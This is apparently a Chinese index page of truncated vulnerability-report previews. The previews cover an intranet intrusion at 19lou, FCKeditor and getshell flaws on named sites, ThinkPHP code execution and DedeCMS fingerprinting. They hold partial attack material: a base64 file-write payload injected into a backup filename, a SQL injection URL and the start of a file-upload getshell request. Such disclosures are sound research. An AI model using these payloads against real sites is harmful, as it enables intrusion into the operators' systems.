关注19楼好久了,在杭州它的群体覆盖面至少达90%以上,本菜鸟平时也喜欢去上面转一转(PS:杭州美女大多喜欢逛19楼)!自从来到wooyun,一直想对19楼做个安全检测(虽然本人技术很菜),然而纵观厂商信息里面各白帽子提交的漏洞,发现19楼安维做得还是蛮不错的,网站方面的漏洞很少,基本让人无法下手。某某说得好,最大的漏洞不是代码而是人,所以,一次偶然的机会,我进到了内网,最终以得到域控制器管理权限…
新网的漏洞,去年就提交了一波(WooYun:新网漏洞大集合),但由于厂商原因给直接忽略了,好伤心的,今翻记事本又拾起,发现部分尚未有修复,整理如下: 1、主站存在FCKeditor 编辑器列目录漏洞,还有两分站也使用的FCKeditor 编辑器 http://www.xinnet.com/FCKeditor/editor/filemanager/browser/default/connectors…
话说某天找dede模板,看到爱丽网模板很华丽很火,遂萌生检测念头,以下内容为记: 爱丽国际集团下有很多大型的门户类行业网站,据初步检测包括:aili.com、27.cn、qilincar.com(爱丽国际旗下麒麟车讯网)、533.com(533出国留学网)、9718.com(爱丽摄影团)、www.aimabz.com/www.86gw.com(北京婚庆网)、www.hongxiutuan.net(…
新网(www.xinnet.com)成立于1993年,是香港联交所上市公司中国数码集团旗下的国内顶级的互联网基础应用服务提供商。业务范围包括域名注册服务、主机服务和电子邮箱服务等。 漏洞说明: 1.Fckeditor编辑器漏洞 话说,2011年某月某日,入手的域名快到期了,于是登陆新网准备续费,貌似网站刚改版,手贱看了下banner图片链接http://hymanage.xinnet.com/cl…
简要描述: 记事狗微博系统,后台存在设计缺陷,可导致进入后台者获得shell 详细说明: 1、系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件 2、在备份文件名中输入 ');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD…
1、查看编辑器版本 /fckeditor/editor/dialog/fck_about.html 2、爆绝对路径 FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php (php通杀) FCKeditor/editor/filemanager/browser/default/bro…
ThinkPHP是一款国内使用比较广泛的老牌PHP MVC框架,有不少创业公司或者项目都用了这个框架(目前我们公司所有项目都是TP的),ThinkPHP不正确过滤用户提交的参数,远程攻击者可以利用漏洞以应用程序上下文执行任意PHP代码。 通过SVN我们来分析一下官方的补丁: /trunk/ThinkPHP/Lib/Core/Dispatcher.class.php 125 - $res = pre…
[ 目录 ] 0x00、前言 0x01、初期的探索 0x02、看到一点希望 0x03、从二级域名入手 0x04、调试php溢出漏洞 0x05、杀个回马枪 0x06、不成功的社工 0x07、V5的迂回战术 0x08、从再读cms源代码到后台getshell 0x09、asp登陆口嗅探变态的密码 0x0a、突破星外+护卫神 0x0b、php嗅探目标管理员密码 0x0c、discuz!提示问题的阻碍 0…
【sqlinjection】 http://www.phpweb.net/down/class/index.php?myord=1 【getshell】 POST /kedit/upload_cgi/upload.php HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/xaml+…
一、查看版本号 打开/include/common.inc.php 查找 $cfg_version 可看版本号 二、查看更新日期 访问/data/admin/ver.txt,可看到更新日期 附加历史更新: 20100708是最新版本5.6 20100324是5.5 20100429之后都是5.6版本,对应的日期为补丁的日期,可以知道什么漏洞没补 5.6版本更新记录: 2010-07-08 1.修复…